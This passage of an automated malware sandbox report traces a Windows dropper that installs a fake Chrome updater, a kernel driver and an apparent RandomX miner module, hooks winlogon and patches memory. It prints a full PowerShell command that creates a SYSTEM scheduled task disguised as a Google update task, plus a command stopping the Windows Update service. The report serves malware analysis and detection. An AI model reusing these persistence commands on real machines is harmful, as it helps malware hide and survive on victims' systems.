          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
          Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
          Source: C:\Windows\System32\choice.exeSection loaded: version.dll
          Source: C:\Windows\System32\choice.exeSection loaded: edgegdi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: dxgi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: dxgi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: dxgi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: dxgi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: dxgi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: dxgi.dll
          Source: C:\Users\user\Desktop\zufmUwylvo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Google\Chrome\updater.exeDirectory created: C:\Program Files\Google\Libs
          Source: zufmUwylvo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: zufmUwylvo.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          barindex
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#irktvxcx#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }Jump to behavior
          Source: zufmUwylvo.exeStatic PE information: 0x9AEB43BA [Sun May 12 06:52:42 2052 UTC]
          Source: initial sampleStatic PE information: section where entry point is pointing to: ..>f
          Source: zxcvbnmasd.exe.0.drStatic PE information: section name: .xdata
          Source: zxcvbnmasd.exe.0.drStatic PE information: section name: .yuZ
          Source: zxcvbnmasd.exe.0.drStatic PE information: section name: .e;T
          Source: zxcvbnmasd.exe.0.drStatic PE information: section name: ."Ki
          Source: zxcvbnmasd.exe.0.drStatic PE information: section name: ..>f
          Source: updater.exe.1.drStatic PE information: section name: .xdata
          Source: updater.exe.1.drStatic PE information: section name: .yuZ
          Source: updater.exe.1.drStatic PE information: section name: .e;T
          Source: updater.exe.1.drStatic PE information: section name: ."Ki
          Source: updater.exe.1.drStatic PE information: section name: ..>f
          Source: jscseoeoqftm.tmp.37.drStatic PE information: section name: _RANDOMX
          Source: jscseoeoqftm.tmp.37.drStatic PE information: section name: _TEXT_CN
          Source: jscseoeoqftm.tmp.37.drStatic PE information: section name: _TEXT_CN
          Source: jscseoeoqftm.tmp.37.drStatic PE information: section name: _RDATA
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D36D22B8 push rdx; retf 0_2_00000125D36D22B9
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D36D84FD push rcx; retf 003Fh0_2_00000125D36D84FE
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00007FF95A54F950 push cs; ret 0_2_00007FF95A5501AF
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00007FF95A5501B0 push cs; ret 0_2_00007FF95A5501AF
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00007FF95A54F93D push cs; ret 0_2_00007FF95A5501AF
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FF95A41D2A5 pushad ; iretd 21_2_00007FF95A41D2A6
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FF95A537B8B push eax; ret 21_2_00007FF95A537B99
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FF95A6055B4 push ecx; iretd 21_2_00007FF95A60560C
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C84884FD push rcx; retf 003Fh24_2_000001F6C84884FE
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C84822B8 push rdx; retf 24_2_000001F6C84822B9
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C88B94FD push rcx; retf 003Fh24_2_000001F6C88B94FE
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C88E84FD push rcx; retf 003Fh24_2_000001F6C88E84FE
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C88E22B8 push rdx; retf 24_2_000001F6C88E22B9
          Source: C:\Windows\System32\winlogon.exeCode function: 24_2_000001F6C89194FD push rcx; retf 003Fh24_2_000001F6C89194FE
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000261AC8E22B8 push rdx; retf 27_2_00000261AC8E22B9
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000261AC8E84FD push rcx; retf 003Fh27_2_00000261AC8E84FE
          Source: C:\Windows\System32\lsass.exeCode function: 27_2_00000261AC9194FD push rcx; retf 003Fh27_2_00000261AC9194FE
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001F0275F22B8 push rdx; retf 28_2_000001F0275F22B9
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001F0275F84FD push rcx; retf 003Fh28_2_000001F0275F84FE
          Source: C:\Windows\System32\svchost.exeCode function: 28_2_000001F0276294FD push rcx; retf 003Fh28_2_000001F0276294FE
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E3E22B8 push rdx; retf 29_2_000002311E3E22B9
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E3E84FD push rcx; retf 003Fh29_2_000002311E3E84FE
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E4194FD push rcx; retf 003Fh29_2_000002311E4194FE
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E4422B8 push rdx; retf 29_2_000002311E4422B9
          Source: C:\Windows\System32\dwm.exeCode function: 29_2_000002311E4484FD push rcx; retf 003Fh29_2_000002311E4484FE
          Source: zufmUwylvo.exe, ekICtOIWXJ.csHigh entropy of concatenated method names: 'swabLfmNIaglcePbRGW', 'tcLsoRlnFyRfwI', 'NFFLQeUbbxzgYdnqPAtlPlhm', 'uzIJJBoTjCWMvGlYAkupkNJR', 'BeDWfcXSRVeM', 'RwLMobReUuINOAm', 'JhqqBHWkxEaytdkGLiSydYYhA', 'hkvIQblVIooVQKaaPkB', 'krJBCfioTlIIqXa', 'ponyNYUvRpSHXDIoghspa'
          Source: zufmUwylvo.exe, roSrfIIxQdQfrmEdXbvoNPsM.csHigh entropy of concatenated method names: 'XcyJWwHAMPWCwOgGMEFhlAo', 'fOJnXobOeWdJNrQeaje', 'fulhNOrQWCGXnT', 'HmUcYnHXZkWsVnbGCWb', 'kccZJxKscPFVtMIrGGFZYWLwq', 'WcuvEBMUteKuSbdP', 'KfByIfjAvQBbORfjnahxgLEJ', 'TdgLnewIbBRpWOxLv', 'kKtfNfLfAvRO', 'arZpCCpIlFSnQNuRMkmlDTzfn'
          Source: zufmUwylvo.exe, DiybvPeeTbqiC.csHigh entropy of concatenated method names: 'qBYKDCTiybvbxhcPVVVIt', 'dCgjRneYuZtuJwoIOzsUkXgUR', 'CDFVNtsqYVdTkfEagViDYfbN', 'VQZPGWMSVlaS', 'LzBTYSevOMPJqKmNY', 'bsOrdTaSzRAPueIIK', 'CEHJjLHDJFQMaFxOyaKT', 'hsFTNuzSlBiADKTP', 'JCkZKVCmqvSffhx', 'MVMBpVRIlYEiMWudzfRHjwX'

          Persistence and Installation Behavior

          barindex
          Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Program Files\Google\Libs\WR64.sys
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to dropped file
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeFile created: C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmpJump to dropped file
          Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\jscseoeoqftm.tmpJump to dropped file
          Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Program Files\Google\Libs\WR64.sysJump to dropped file
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile created: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeJump to dropped file
          Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\jscseoeoqftm.tmpJump to dropped file
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JSCSEOEOQFTM.TMP
          Source: C:\Program Files\Google\Chrome\updater.exeModule Loaded: C:\WINDOWS\TEMP\JSCSEOEOQFTM.TMP
          Source: C:\Program Files\Google\Chrome\updater.exeModule Loaded: C:\WINDOWS\TEMP\JSCSEOEOQFTM.TMP
          Source: C:\Program Files\Google\Chrome\updater.exeModule Loaded: C:\WINDOWS\TEMP\JSCSEOEOQFTM.TMP
          Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
          Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
          Source: winlogon.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
          Source: winlogon.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9A 0xA3 0x32 0x2E 0xEF
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeMemory written: PID: 6672 base: 7FF9CD790008 value: E9 0B D8 E9 FF Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exeMemory written: PID: 6672 base: 7FF9CD62D810 value: E9 00 28 16 00 Jump to behavior
          Source: C:\Program Files\Google\Chrome\updater.exeMemory written: PID: 8404 base: 7FF9CD790008 value: E9 0B D8 E9 FF
          Source: C:\Program Files\Google\Chrome\updater.exeMemory written: PID: 8404 base: 7FF9CD62D810 value: E9 00 28 16 00
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
